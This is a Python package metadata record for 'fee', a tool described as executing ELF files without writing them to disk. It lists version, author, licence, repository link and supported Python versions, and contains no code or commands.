Metadata-Version: 2.1
Name: fee
Version: 0.2.0
Summary: Execute ELF files without dropping them on disk
Home-page: https://github.com/nnsee/fileless-elf-exec
License: GPLv3
Author: Rasmus Moorats
Author-email: xx@nns.ee
Requires-Python: >=3.6.2,<4.0
Classifier: License :: Other/Proprietary License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Project-URL: Repository, https://github.com/nnsee/fileless-elf-exec
